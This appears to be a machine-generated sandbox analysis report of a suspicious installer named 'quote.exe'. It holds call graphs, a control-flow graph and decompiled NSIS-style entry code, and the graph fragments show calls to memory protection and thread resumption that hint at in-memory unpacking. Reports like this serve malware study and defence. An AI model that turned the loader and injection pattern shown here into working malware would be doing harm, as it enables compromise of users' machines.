18608 2c879c6 18607->18608 18611 2c87b87 18607->18611 18610 2c87a13 18608->18610 18612 2c938bb NtResumeThread 18608->18612 18609 2c87c20 18613 2c87b6a 18610->18613 18615 2c938bb NtResumeThread 18610->18615 18611->18609 18614 2c90bd1 3 API calls 18611->18614 18618 2c9010b 18611->18618 18612->18610 18616 2c900ff 18614->18616 18615->18613 18617 2c90306 3 API calls 18616->18617 18617->18618 18619 2c90306 3 API calls 18618->18619 18620 2c902cb 18619->18620 18635 2c8ac08 18621->18635 18622 2c90063 GetPEB NtProtectVirtualMemory NtResumeThread 18622->18635 18623 2c91ee3 GetPEB 18651 2c92ab2 NtProtectVirtualMemory 18623->18651 18625 2c92aaf 18625->18601 18627 2c929c2 18630 2c929e9 18627->18630 18631 2c83e14 18627->18631 18628 2c92735 18653 2c92ab2 NtProtectVirtualMemory 18628->18653 18629 2c925fb 18652 2c92ab2 NtProtectVirtualMemory 18629->18652 18630->18625 18654 2c92ab2 NtProtectVirtualMemory 18630->18654 18636 2c938bb NtResumeThread 18631->18636 18634 2c928bb 18634->18601 18635->18601 18635->18621 18635->18622 18635->18623 18635->18627 18635->18628 18635->18629 18635->18630 18638 2c87c20 18635->18638 18637 2c87867 18636->18637 18639 2c879c6 18637->18639 18641 2c87b87 18637->18641 18638->18601 18640 2c87a13 18639->18640 18642 2c938bb NtResumeThread 18639->18642 18643 2c87b6a 18640->18643 18645 2c938bb NtResumeThread 18640->18645 18641->18638 18644 2c90bd1 3 API calls 18641->18644 18648 2c9010b 18641->18648 18642->18640 18643->18601 18646 2c900ff 18644->18646 18645->18643 18647 2c90306 3 API calls 18646->18647 18647->18648 18649 2c90306 3 API calls 18648->18649 18650 2c902cb 18649->18650 18650->18601 18651->18635 18652->18638 18653->18634 18654->18625 19736 401ff6 19737 402d3e 17 API calls 19736->19737 19738 401ffd 19737->19738 19739 40676f 2 API calls 19738->19739 19740 402003 19739->19740 19742 402014 19740->19742 19743 406358 wsprintfW 19740->19743 19743->19742 17064 402596 17074 402d7e 17064->17074 17067 402d1c 17 API calls 17068 4025a9 17067->17068 17069 4025d1 RegEnumValueW 17068->17069 17070 4025c5 RegEnumKeyW 17068->17070 17072 402925 17068->17072 17071 4025e6 RegCloseKey 17069->17071 17070->17071 17071->17072 17075 402d3e 17 API calls 17074->17075 17076 402d95 17075->17076 17077 40627e RegOpenKeyExW 17076->17077 17078 4025a0 17077->17078 17078->17067 17087 401b9b 17088 401ba8 17087->17088 17089 401bec 17087->17089 17090 401c31 17088->17090 17096 401bbf 17088->17096 17091 401bf1 17089->17091 17092 401c16 GlobalAlloc 17089->17092 17094 40644e 17 API calls 17090->17094 17100 402395 17090->17100 17091->17100 17108 406411 lstrcpynW 17091->17108 17093 40644e 17 API calls 17092->17093 17093->17090 17095 40238f 17094->17095 17095->17100 17101 405a77 MessageBoxIndirectW 17095->17101 17106 406411 lstrcpynW 17096->17106 17099 401c03 GlobalFree 17099->17100 17101->17100 17102 401bce 17107 406411 lstrcpynW 17102->17107 17104 401bdd 17109 406411 lstrcpynW 17104->17109 17106->17102 17107->17104 17108->17099 17109->17100 19774 2c87928 19775 2c87930 19774->19775 19776 2c879c6 19775->19776 19777 2c87b87 19775->19777 19778 2c87a13 19776->19778 19779 2c938bb NtResumeThread 19776->19779 19781 2c87c20 19777->19781 19783 2c90bd1 3 API calls 19777->19783 19786 2c9010b 19777->19786 19780 2c87b6a 19778->19780 19782 2c938bb NtResumeThread 19778->19782 19779->19778 19782->19780 19784 2c900ff 19783->19784 19785 2c90306 3 API calls 19784->19785 19785->19786 19787 2c90306 3 API calls 19786->19787 19788 2c902cb 19787->19788 17136 4021a2 17137 402d3e 17 API calls 17136->17137 17138 4021a9 17137->17138 17139 402d3e 17 API calls 17138->17139 17140 4021b3 17139->17140 17141 402d3e 17 API calls 17140->17141 17142 4021bd 17141->17142 17143 402d3e 17 API calls 17142->17143 17144 4021c7 17143->17144 17145 402d3e 17 API calls 17144->17145 17147 4021d1 17145->17147 17146 402210 CoCreateInstance 17151 40222f 17146->17151 17147->17146 17148 402d3e 17 API calls 17147->17148 17148->17146 17149 401423 24 API calls 17150 4022ee 17149->17150 17151->17149 17151->17150 17152 4015a3 17153 402d3e 17 API calls 17152->17153 17154 4015aa SetFileAttributesW 17153->17154 17155 4015bc 17154->17155 17180 401fa4 17181 402d3e 17 API calls 17180->17181 17182 401faa 17181->17182 17183 405479 24 API calls 17182->17183 17184 401fb4 17183->17184 17185 4059fa 2 API calls 17184->17185 17186 401fba 17185->17186 17187 402925 17186->17187 17193 401fdd CloseHandle 17186->17193 17195 4068b1 WaitForSingleObject 17186->17195 17190 401fcf 17191 401fd4 17190->17191 17192 401fdf 17190->17192 17200 406358 wsprintfW 17191->17200 17192->17193 17193->17187 17196 4068cb 17195->17196 17197 4068dd GetExitCodeProcess 17196->17197 17198 406842 2 API calls 17196->17198 17197->17190 17199 4068d2 WaitForSingleObject 17198->17199 17199->17196 17200->17193 18848 2c83b3e 18850 2c83ba2 18848->18850 18849 2c90063 3 API calls 18849->18850 18850->18849 18851 2c91e4b 4 API calls 18850->18851 18853 2c83bf7 18850->18853 18851->18850 18852 2c83c14 18853->18852 18854 2c938bb NtResumeThread 18853->18854 18855 2c87867 18854->18855 18856 2c879c6 18855->18856 18859 2c87b87 18855->18859 18858 2c87a13 18856->18858 18860 2c938bb NtResumeThread 18856->18860 18857 2c87c20 18861 2c87b6a 18858->18861 18863 2c938bb NtResumeThread 18858->18863 18859->18857 18862 2c90bd1 3 API calls 18859->18862 18866 2c9010b 18859->18866 18860->18858 18864 2c900ff 18862->18864 18863->18861 18865 2c90306 3 API calls 18864->18865 18865->18866 18867 2c90306 3 API calls 18866->18867 18868 2c902cb 18867->18868 17247 4055b8 17248 405762 17247->17248 17249 4055d9 GetDlgItem GetDlgItem GetDlgItem 17247->17249 17250 405793 17248->17250 17251 40576b GetDlgItem CreateThread CloseHandle 17248->17251 17293 40439c SendMessageW 17249->17293 17253 4057be 17250->17253 17255 4057e3 17250->17255 17256 4057aa ShowWindow ShowWindow 17250->17256 17251->17250 17296 40554c 5 API calls 17251->17296 17257 4057ca 17253->17257 17258 40581e 17253->17258 17254 405649 17259 405650 GetClientRect GetSystemMetrics SendMessageW SendMessageW 17254->17259 17263 4043ce 8 API calls 17255->17263 17295 40439c SendMessageW 17256->17295 17261 4057d2 17257->17261 17262 4057f8 ShowWindow 17257->17262 17258->17255 17266 40582c SendMessageW 17258->17266 17264 4056a2 SendMessageW SendMessageW 17259->17264 17265 4056be 17259->17265 17267 404340 SendMessageW 17261->17267 17269 405818 17262->17269 17270 40580a 17262->17270 17268 4057f1 17263->17268 17264->17265 17272 4056d1 17265->17272 17273 4056c3 SendMessageW 17265->17273 17266->17268 17274 405845 CreatePopupMenu 17266->17274 17267->17255 17271 404340 SendMessageW 17269->17271 17275 405479 24 API calls 17270->17275 17271->17258 17277 404367 18 API calls 17272->17277 17273->17272 17276 40644e 17 API calls 17274->17276 17275->17269 17278 405855 AppendMenuW 17276->17278 17279 4056e1 17277->17279 17280 405872 GetWindowRect 17278->17280 17281 405885 TrackPopupMenu 17278->17281 17282 4056ea ShowWindow 17279->17282 17283 40571e GetDlgItem SendMessageW 17279->17283 17280->17281 17281->17268 17284 4058a0 17281->17284 17285 405700 ShowWindow 17282->17285 17286 40570d 17282->17286 17283->17268 17287 405745 SendMessageW SendMessageW 17283->17287 17288 4058bc SendMessageW 17284->17288 17285->17286 17294 40439c SendMessageW 17286->17294 17287->17268 17288->17288 17289 4058d9 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 17288->17289 17291 4058fe SendMessageW 17289->17291 17291->17291 17292 405927 GlobalUnlock SetClipboardData CloseClipboard 17291->17292 17292->17268 17293->17254 17294->17283 17295->17253

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 0 4034c5-403502 SetErrorMode GetVersion 1 403504-40350c call 406806 0->1 2 403515 0->2 1->2 7 40350e 1->7 3 40351a-40352e call 406796 lstrlenA 2->3 9 403530-40354c call 406806 * 3 3->9 7->2 16 40355d-4035bc #17 OleInitialize SHGetFileInfoW call 406411 GetCommandLineW call 406411 9->16 17 40354e-403554 9->17 24 4035c6-4035e0 call 405d13 CharNextW 16->24 25 4035be-4035c5 16->25 17->16 21 403556 17->21 21->16 28 4035e6-4035ec 24->28 29 4036f7-403711 GetTempPathW call 403494 24->29 25->24 31 4035f5-4035f9 28->31 32 4035ee-4035f3 28->32 38 403713-403731 GetWindowsDirectoryW lstrcatW call 403494 29->38 39 403769-403783 DeleteFileW call 403015 29->39 34 403600-403604 31->34 35 4035fb-4035ff 31->35 32->31 32->32 36 4036c3-4036d0 call 405d13 34->36 37 40360a-403610 34->37 35->34 57 4036d2-4036d3 36->57 58 4036d4-4036da 36->58 40 403612-40361a 37->40 41 40362b-403664 37->41 38->39 56 403733-403763 GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 403494 38->56 52 403834-403844 call 403a06 OleUninitialize 39->52 53 403789-40378f 39->53 45 403621 40->45 46 40361c-40361f 40->46 47 403681-4036bb 41->47 48 403666-40366b 41->48 45->41 46->41 46->45 47->36 55 4036bd-4036c1 47->55 48->47 54 40366d-403675 48->54 75 40396a-403970 52->75 76 40384a-40385a call 405a77 ExitProcess 52->76 60 403824-40382b call 403ae0 53->60 61 403795-4037a0 call 405d13 53->61 63 403677-40367a 54->63 64 40367c 54->64 55->36 65 4036e2-4036f0 call 406411 55->65 56->39 56->52 57->58 58->28 59 4036e0 58->59 67 4036f5 59->67 74 403830 60->74 77 4037a2-4037d7 61->77 78 4037ee-4037f8 61->78 63->47 63->64 64->47 65->67 67->29 74->52 80 403972-403988 GetCurrentProcess OpenProcessToken 75->80 81 4039ee-4039f6 75->81 82 4037d9-4037dd 77->82 85 403860-403874 call 4059e2 lstrcatW 78->85 86 4037fa-403808 call 405dee 78->86 88 40398a-4039b8 LookupPrivilegeValueW AdjustTokenPrivileges 80->88 89 4039be-4039cc call 406806 80->89 83 4039f8 81->83 84 4039fc-403a00 ExitProcess 81->84 91 4037e6-4037ea 82->91 92 4037df-4037e4 82->92 83->84 102 403881-40389b lstrcatW lstrcmpiW 85->102 103 403876-40387c lstrcatW 85->103 86->52 101 40380a-403820 call 406411 * 2 86->101 88->89 99 4039da-4039e5 ExitWindowsEx 89->99 100 4039ce-4039d8 89->100 91->82 96 4037ec 91->96 92->91 92->96 96->78 99->81 105 4039e7-4039e9 call 40140b 99->105 100->99 100->105 101->60 102->52 104 40389d-4038a0 102->104 103->102 107 4038a2-4038a7 call 405948 104->107 108 4038a9 call 4059c5 104->108 105->81 117 4038ae-4038bc SetCurrentDirectoryW 107->117 108->117 118 4038c9-4038f2 call 406411 117->118 119 4038be-4038c4 call 406411 117->119 123 4038f7-403913 call 40644e DeleteFileW 118->123 119->118 126 403954-40395c 123->126 127 403915-403925 CopyFileW 123->127 126->123 129 40395e-403965 call 4061d7 126->129 127->126 128 403927-403947 call 4061d7 call 40644e call 4059fa 127->128 128->126 138 403949-403950 CloseHandle 128->138 129->52 138->126
                                                                                      C-Code - Quality: 81%
                                                                                      			_entry_() {
                                                                                      				signed int _t51;
                                                                                      				intOrPtr* _t56;
                                                                                      				WCHAR* _t60;
                                                                                      				char* _t62;
                                                                                      				void* _t65;
                                                                                      				void* _t67;
                                                                                      				int _t69;
                                                                                      				int _t71;
                                                                                      				int _t74;
                                                                                      				intOrPtr* _t75;
                                                                                      				int _t76;
                                                                                      				int _t78;
                                                                                      				void* _t102;
                                                                                      				signed int _t119;
                                                                                      				void* _t122;
                                                                                      				void* _t127;
                                                                                      				intOrPtr _t146;
                                                                                      				intOrPtr _t147;
                                                                                      				intOrPtr* _t148;
                                                                                      				int _t150;
                                                                                      				void* _t153;
                                                                                      				int _t154;
                                                                                      				signed int _t158;
                                                                                      				signed int _t163;
                                                                                      				signed int _t168;
                                                                                      				void* _t170;
                                                                                      				void* _t172;
                                                                                      				int* _t174;
                                                                                      				signed int _t180;
                                                                                      				signed int _t183;
                                                                                      				CHAR* _t184;
                                                                                      				WCHAR* _t185;
                                                                                      				void* _t191;
                                                                                      				char* _t192;
                                                                                      				void* _t195;
                                                                                      				void* _t196;
                                                                                      				void* _t242;
                                                                                      
                                                                                      				_t170 = 0x20;
                                                                                      				_t150 = 0;
                                                                                      				 *(_t196 + 0x14) = 0;
                                                                                      				 *(_t196 + 0x10) = L"Error writing temporary file. Make sure your temp folder is valid.";
                                                                                      				 *(_t196 + 0x1c) = 0;
                                                                                      				SetErrorMode(0x8001); // executed
                                                                                      				_t51 = GetVersion() & 0xbfffffff;
                                                                                      				 *0x434f0c = _t51;
                                                                                      				if(_t51 != 6) {
                                                                                      					_t148 = E00406806(0);
                                                                                      					if(_t148 != 0) {
                                                                                      						 *_t148(0xc00);
                                                                                      					}
                                                                                      				}
                                                                                      				_t184 = "UXTHEME";
                                                                                      				goto L4;
                                                                                      				L8:
                                                                                      				__imp__#17(_t191);
                                                                                      				__imp__OleInitialize(_t150); // executed
                                                                                      				 *0x434fd8 = _t56;
                                                                                      				SHGetFileInfoW(0x42b228, _t150, _t196 + 0x34, 0x2b4, _t150); // executed
                                                                                      				E00406411(0x433f00, L"NSIS Error");
                                                                                      				_t60 = GetCommandLineW();
                                                                                      				_t192 = L"\"C:\\Users\\Arthur\\Desktop\\quote.exe\" ";
                                                                                      				E00406411(_t192, _t60);
                                                                                      				 *0x434f00 = 0x400000;
                                                                                      				_t62 = _t192;
                                                                                      				if(L"\"C:\\Users\\Arthur\\Desktop\\quote.exe\" " == 0x22) {
                                                                                      					_t62 =  &M00440002;
                                                                                      					_t170 = 0x22;
                                                                                      				}
                                                                                      				_t154 = CharNextW(E00405D13(_t62, _t170));
                                                                                      				 *(_t196 + 0x18) = _t154;
                                                                                      				_t65 =  *_t154;
                                                                                      				if(_t65 == _t150) {
                                                                                      					L33:
                                                                                      					_t185 = L"C:\\Users\\Arthur\\AppData\\Local\\Temp\\";
                                                                                      					GetTempPathW(0x400, _t185);
                                                                                      					_t67 = E00403494(_t154, 0);
                                                                                      					_t224 = _t67;
                                                                                      					if(_t67 != 0) {
                                                                                      						L36:
                                                                                      						DeleteFileW(L"1033"); // executed
                                                                                      						_t69 = E00403015(_t226,  *(_t196 + 0x1c)); // executed
                                                                                      						 *(_t196 + 0x10) = _t69;
                                                                                      						if(_t69 != _t150) {
                                                                                      							L48:
                                                                                      							E00403A06();
                                                                                      							__imp__OleUninitialize();
                                                                                      							_t238 =  *(_t196 + 0x10) - _t150;
                                                                                      							if( *(_t196 + 0x10) == _t150) {
                                                                                      								__eflags =  *0x434fb4 - _t150;
                                                                                      								if( *0x434fb4 == _t150) {
                                                                                      									L72:
                                                                                      									_t71 =  *0x434fcc;
                                                                                      									__eflags = _t71 - 0xffffffff;
                                                                                      									if(_t71 != 0xffffffff) {
                                                                                      										 *(_t196 + 0x10) = _t71;
                                                                                      									}
                                                                                      									ExitProcess( *(_t196 + 0x10));
                                                                                      								}
                                                                                      								_t74 = OpenProcessToken(GetCurrentProcess(), 0x28, _t196 + 0x14);
                                                                                      								__eflags = _t74;
                                                                                      								if(_t74 != 0) {
                                                                                      									LookupPrivilegeValueW(_t150, L"SeShutdownPrivilege", _t196 + 0x20);
                                                                                      									 *(_t196 + 0x34) = 1;
                                                                                      									 *(_t196 + 0x40) = 2;
                                                                                      									AdjustTokenPrivileges( *(_t196 + 0x28), _t150, _t196 + 0x24, _t150, _t150, _t150);
                                                                                      								}
                                                                                      								_t75 = E00406806(4);
                                                                                      								__eflags = _t75 - _t150;
                                                                                      								if(_t75 == _t150) {
                                                                                      									L70:
                                                                                      									_t76 = ExitWindowsEx(2, 0x80040002);
                                                                                      									__eflags = _t76;
                                                                                      									if(_t76 != 0) {
                                                                                      										goto L72;
                                                                                      									}
                                                                                      									goto L71;
                                                                                      								} else {
                                                                                      									_t78 =  *_t75(_t150, _t150, _t150, 0x25, 0x80040002);
                                                                                      									__eflags = _t78;
                                                                                      									if(_t78 == 0) {
                                                                                      										L71:
                                                                                      										E0040140B(9);
                                                                                      										goto L72;
                                                                                      									}
                                                                                      									goto L70;
                                                                                      								}
                                                                                      							}
                                                                                      							E00405A77( *(_t196 + 0x10), 0x200010);
                                                                                      							ExitProcess(2);
                                                                                      						}
                                                                                      						if( *0x434f20 == _t150) {
                                                                                      							L47:
                                                                                      							 *0x434fcc =  *0x434fcc | 0xffffffff;
                                                                                      							 *(_t196 + 0x14) = E00403AE0( *0x434fcc);
                                                                                      							goto L48;
                                                                                      						}
                                                                                      						_t174 = E00405D13(_t192, _t150);
                                                                                      						if(_t174 < _t192) {
                                                                                      							L44:
                                                                                      							_t235 = _t174 - _t192;
                                                                                      							 *(_t196 + 0x10) = L"Error launching installer";
                                                                                      							if(_t174 < _t192) {
                                                                                      								_t172 = E004059E2(_t238);
                                                                                      								lstrcatW(_t185, L"~nsu");
                                                                                      								if(_t172 != _t150) {
                                                                                      									lstrcatW(_t185, "A");
                                                                                      								}
                                                                                      								lstrcatW(_t185, L".tmp");
                                                                                      								_t194 = L"C:\\Users\\Arthur\\Desktop";
                                                                                      								if(lstrcmpiW(_t185, L"C:\\Users\\Arthur\\Desktop") != 0) {
                                                                                      									_push(_t185);
                                                                                      									if(_t172 == _t150) {
                                                                                      										E004059C5();
                                                                                      									} else {
                                                                                      										E00405948();
                                                                                      									}
                                                                                      									SetCurrentDirectoryW(_t185);
                                                                                      									_t242 = L"C:\\Users\\Arthur\\AppData\\Local\\Temp\\Susendes\\Scrumption" - _t150; // 0x43
                                                                                      									if(_t242 == 0) {
                                                                                      										E00406411(L"C:\\Users\\Arthur\\AppData\\Local\\Temp\\Susendes\\Scrumption", _t194);
                                                                                      									}
                                                                                      									E00406411(0x436000,  *(_t196 + 0x18));
                                                                                      									_t155 = "A" & 0x0000ffff;
                                                                                      									 *0x436800 = ( *0x40a25a & 0x0000ffff) << 0x00000010 | "A" & 0x0000ffff;
                                                                                      									_t195 = 0x1a;
                                                                                      									do {
                                                                                      										E0040644E(_t150, 0x42aa28, _t185, 0x42aa28,  *((intOrPtr*)( *0x434f14 + 0x120)));
                                                                                      										DeleteFileW(0x42aa28);
                                                                                      										if( *(_t196 + 0x10) != _t150 && CopyFileW(L"C:\\Users\\Arthur\\Desktop\\quote.exe", 0x42aa28, 1) != 0) {
                                                                                      											E004061D7(_t155, 0x42aa28, _t150);
                                                                                      											E0040644E(_t150, 0x42aa28, _t185, 0x42aa28,  *((intOrPtr*)( *0x434f14 + 0x124)));
                                                                                      											_t102 = E004059FA(0x42aa28);
                                                                                      											if(_t102 != _t150) {
                                                                                      												CloseHandle(_t102);
                                                                                      												 *(_t196 + 0x10) = _t150;
                                                                                      											}
                                                                                      										}
                                                                                      										 *0x436800 =  *0x436800 + 1;
                                                                                      										_t195 = _t195 - 1;
                                                                                      									} while (_t195 != 0);
                                                                                      									E004061D7(_t155, _t185, _t150);
                                                                                      								}
                                                                                      								goto L48;
                                                                                      							}
                                                                                      							 *_t174 = _t150;
                                                                                      							_t175 =  &(_t174[2]);
                                                                                      							if(E00405DEE(_t235,  &(_t174[2])) == 0) {
                                                                                      								goto L48;
                                                                                      							}
                                                                                      							E00406411(L"C:\\Users\\Arthur\\AppData\\Local\\Temp\\Susendes\\Scrumption", _t175);
                                                                                      							E00406411(L"C:\\Users\\Arthur\\AppData\\Local\\Temp\\Susendes\\Scrumption\\Dioxide\\Spokeswoman\\Gelatinous\\Passado195", _t175);
                                                                                      							 *(_t196 + 0x10) = _t150;
                                                                                      							goto L47;
                                                                                      						}
                                                                                      						asm("cdq");
                                                                                      						asm("cdq");
                                                                                      						asm("cdq");
                                                                                      						_t158 = ( *0x40a27e & 0x0000ffff) << 0x00000010 | L" _?=" & 0x0000ffff;
                                                                                      						_t119 = ( *0x40a282 & 0x0000ffff) << 0x00000010 |  *0x40a280 & 0x0000ffff | (_t163 << 0x00000020 |  *0x40a282 & 0x0000ffff) << 0x10;
                                                                                      						while( *_t174 != _t158 || _t174[1] != _t119) {
                                                                                      							_t174 = _t174;
                                                                                      							if(_t174 >= _t192) {
                                                                                      								continue;
                                                                                      							}
                                                                                      							break;
                                                                                      						}
                                                                                      						_t150 = 0;
                                                                                      						goto L44;
                                                                                      					}
                                                                                      					GetWindowsDirectoryW(_t185, 0x3fb);
                                                                                      					lstrcatW(_t185, L"\\Temp");
                                                                                      					_t122 = E00403494(_t154, _t224);
                                                                                      					_t225 = _t122;
                                                                                      					if(_t122 != 0) {
                                                                                      						goto L36;
                                                                                      					}
                                                                                      					GetTempPathW(0x3fc, _t185);
                                                                                      					lstrcatW(_t185, L"Low");
                                                                                      					SetEnvironmentVariableW(L"TEMP", _t185);
                                                                                      					SetEnvironmentVariableW(L"TMP", _t185);
                                                                                      					_t127 = E00403494(_t154, _t225);
                                                                                      					_t226 = _t127;
                                                                                      					if(_t127 == 0) {
                                                                                      						goto L48;
                                                                                      					}
                                                                                      					goto L36;
                                                                                      				} else {
                                                                                      					do {
                                                                                      						_t153 = 0x20;
                                                                                      						if(_t65 != _t153) {
                                                                                      							L13:
                                                                                      							if( *_t154 == 0x22) {
                                                                                      								_t154 = _t154 + 2;
                                                                                      								_t153 = 0x22;
                                                                                      							}
                                                                                      							if( *_t154 != 0x2f) {
                                                                                      								goto L27;
                                                                                      							} else {
                                                                                      								_t154 = _t154 + 2;
                                                                                      								if( *_t154 == 0x53) {
                                                                                      									_t147 =  *((intOrPtr*)(_t154 + 2));
                                                                                      									if(_t147 == 0x20 || _t147 == 0) {
                                                                                      										 *0x434fc0 = 1;
                                                                                      									}
                                                                                      								}
                                                                                      								asm("cdq");
                                                                                      								asm("cdq");
                                                                                      								_t168 = L"NCRC" & 0x0000ffff;
                                                                                      								asm("cdq");
                                                                                      								_t180 = ( *0x40a2c2 & 0x0000ffff) << 0x00000010 |  *0x40a2c0 & 0x0000ffff | _t168;
                                                                                      								if( *_t154 == (( *0x40a2be & 0x0000ffff) << 0x00000010 | _t168) &&  *((intOrPtr*)(_t154 + 4)) == _t180) {
                                                                                      									_t146 =  *((intOrPtr*)(_t154 + 8));
                                                                                      									if(_t146 == 0x20 || _t146 == 0) {
                                                                                      										 *(_t196 + 0x1c) =  *(_t196 + 0x1c) | 0x00000004;
                                                                                      									}
                                                                                      								}
                                                                                      								asm("cdq");
                                                                                      								asm("cdq");
                                                                                      								_t163 = L" /D=" & 0x0000ffff;
                                                                                      								asm("cdq");
                                                                                      								_t183 = ( *0x40a2b6 & 0x0000ffff) << 0x00000010 |  *0x40a2b4 & 0x0000ffff | _t163;
                                                                                      								if( *(_t154 - 4) != (( *0x40a2b2 & 0x0000ffff) << 0x00000010 | _t163) ||  *_t154 != _t183) {
                                                                                      									goto L27;
                                                                                      								} else {
                                                                                      									 *(_t154 - 4) =  *(_t154 - 4) & 0x00000000;
                                                                                      									__eflags = _t154;
                                                                                      									E00406411(L"C:\\Users\\Arthur\\AppData\\Local\\Temp\\Susendes\\Scrumption", _t154);
                                                                                      									L32:
                                                                                      									_t150 = 0;
                                                                                      									goto L33;
                                                                                      								}
                                                                                      							}
                                                                                      						} else {
                                                                                      							goto L12;
                                                                                      						}
                                                                                      						do {
                                                                                      							L12:
                                                                                      							_t154 = _t154 + 2;
                                                                                      						} while ( *_t154 == _t153);
                                                                                      						goto L13;
                                                                                      						L27:
                                                                                      						_t154 = E00405D13(_t154, _t153);
                                                                                      						if( *_t154 == 0x22) {
                                                                                      							_t154 = _t154 + 2;
                                                                                      						}
                                                                                      						_t65 =  *_t154;
                                                                                      					} while (_t65 != 0);
                                                                                      					goto L32;
                                                                                      				}
                                                                                      				L4:
                                                                                      				E00406796(_t184); // executed
                                                                                      				_t184 =  &(_t184[lstrlenA(_t184) + 1]);
                                                                                      				if( *_t184 != 0) {
                                                                                      					goto L4;
                                                                                      				} else {
                                                                                      					E00406806(0xb);
                                                                                      					 *0x434f04 = E00406806(9);
                                                                                      					_t56 = E00406806(7);
                                                                                      					if(_t56 != _t150) {
                                                                                      						_t56 =  *_t56(0x1e);
                                                                                      						if(_t56 != 0) {
                                                                                      							 *0x434f0f =  *0x434f0f | 0x00000040;
                                                                                      						}
                                                                                      					}
                                                                                      					goto L8;
                                                                                      				}
                                                                                      			}








































                                                                                      0x004034d0
                                                                                      0x004034d1
                                                                                      0x004034d8
                                                                                      0x004034dc
                                                                                      0x004034e4
                                                                                      0x004034e8
                                                                                      0x004034f4
                                                                                      0x004034fd
                                                                                      0x00403502
                                                                                      0x00403505
                                                                                      0x0040350c
                                                                                      0x00403513
                                                                                      0x00403513
                                                                                      0x0040350c
                                                                                      0x00403515
                                                                                      0x00403515
                                                                                      0x0040355d
                                                                                      0x0040355e
                                                                                      0x00403565
                                                                                      0x0040356b
                                                                                      0x00403581
                                                                                      0x00403591
                                                                                      0x00403596
                                                                                      0x0040359c
                                                                                      0x004035a3
                                                                                      0x004035b0
                                                                                      0x004035ba
                                                                                      0x004035bc
                                                                                      0x004035c0
                                                                                      0x004035c5
                                                                                      0x004035c5
                                                                                      0x004035d4
                                                                                      0x004035d6
                                                                                      0x004035da
                                                                                      0x004035e0
                                                                                      0x004036f7
                                                                                      0x004036fd
                                                                                      0x00403708
                                                                                      0x0040370a
                                                                                      0x0040370f
                                                                                      0x00403711
                                                                                      0x00403769
                                                                                      0x0040376e
                                                                                      0x00403778
                                                                                      0x0040377f
                                                                                      0x00403783
                                                                                      0x00403834
                                                                                      0x00403834
                                                                                      0x00403839
                                                                                      0x0040383f
                                                                                      0x00403844
                                                                                      0x0040396a
                                                                                      0x00403970
                                                                                      0x004039ee
                                                                                      0x004039ee
                                                                                      0x004039f3
                                                                                      0x004039f6
                                                                                      0x004039f8
                                                                                      0x004039f8
                                                                                      0x00403a00
                                                                                      0x00403a00
                                                                                      0x00403980
                                                                                      0x00403986
                                                                                      0x00403988
                                                                                      0x00403995
                                                                                      0x004039a8
                                                                                      0x004039b0
                                                                                      0x004039b8
                                                                                      0x004039b8
                                                                                      0x004039c0
                                                                                      0x004039c5
                                                                                      0x004039cc
                                                                                      0x004039da
                                                                                      0x004039dd
                                                                                      0x004039e3
                                                                                      0x004039e5
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x004039ce
                                                                                      0x004039d4
                                                                                      0x004039d6
                                                                                      0x004039d8
                                                                                      0x004039e7
                                                                                      0x004039e9
                                                                                      0x00000000
                                                                                      0x004039e9
                                                                                      0x00000000
                                                                                      0x004039d8
                                                                                      0x004039cc
                                                                                      0x00403853
                                                                                      0x0040385a
                                                                                      0x0040385a
                                                                                      0x0040378f
                                                                                      0x00403824
                                                                                      0x00403824
                                                                                      0x00403830
                                                                                      0x00000000
                                                                                      0x00403830
                                                                                      0x0040379c
                                                                                      0x004037a0
                                                                                      0x004037ee
                                                                                      0x004037ee
                                                                                      0x004037f0
                                                                                      0x004037f8
                                                                                      0x0040386b
                                                                                      0x0040386d
                                                                                      0x00403874
                                                                                      0x0040387c
                                                                                      0x0040387c
                                                                                      0x00403887
                                                                                      0x0040388c
                                                                                      0x0040389b
                                                                                      0x0040389f
                                                                                      0x004038a0
                                                                                      0x004038a9
                                                                                      0x004038a2
                                                                                      0x004038a2
                                                                                      0x004038a2
                                                                                      0x004038af
                                                                                      0x004038b5
                                                                                      0x004038bc
                                                                                      0x004038c4
                                                                                      0x004038c4
                                                                                      0x004038d2
                                                                                      0x004038de
                                                                                      0x004038ec
                                                                                      0x004038f1
                                                                                      0x004038f7
                                                                                      0x00403903
                                                                                      0x00403909
                                                                                      0x00403913
                                                                                      0x00403929
                                                                                      0x0040393a
                                                                                      0x00403940
                                                                                      0x00403947
                                                                                      0x0040394a
                                                                                      0x00403950
                                                                                      0x00403950
                                                                                      0x00403947
                                                                                      0x00403954
                                                                                      0x0040395b
                                                                                      0x0040395b
                                                                                      0x00403960
                                                                                      0x00403960
                                                                                      0x00000000
                                                                                      0x0040389b
                                                                                      0x004037fa
                                                                                      0x004037fd
                                                                                      0x00403808
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00403810
                                                                                      0x0040381b
                                                                                      0x00403820
                                                                                      0x00000000
                                                                                      0x00403820
                                                                                      0x004037a9
                                                                                      0x004037c1
                                                                                      0x004037d2
                                                                                      0x004037d3
                                                                                      0x004037d7
                                                                                      0x004037d9
                                                                                      0x004037e7
                                                                                      0x004037ea
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x004037ea
                                                                                      0x004037ec
                                                                                      0x00000000
                                                                                      0x004037ec
                                                                                      0x00403719
                                                                                      0x00403725
                                                                                      0x0040372a
                                                                                      0x0040372f
                                                                                      0x00403731
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00403739
                                                                                      0x00403741
                                                                                      0x00403752
                                                                                      0x0040375a
                                                                                      0x0040375c
                                                                                      0x00403761
                                                                                      0x00403763
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x004035e6
                                                                                      0x004035e6
                                                                                      0x004035e8
                                                                                      0x004035ec
                                                                                      0x004035f5
                                                                                      0x004035f9
                                                                                      0x004035fe
                                                                                      0x004035ff
                                                                                      0x004035ff
                                                                                      0x00403604
                                                                                      0x00000000
                                                                                      0x0040360a
                                                                                      0x0040360b
                                                                                      0x00403610
                                                                                      0x00403612
                                                                                      0x0040361a
                                                                                      0x00403621
                                                                                      0x00403621
                                                                                      0x0040361a
                                                                                      0x00403632
                                                                                      0x00403645
                                                                                      0x00403646
                                                                                      0x0040365b
                                                                                      0x00403660
                                                                                      0x00403664
                                                                                      0x0040366d
                                                                                      0x00403675
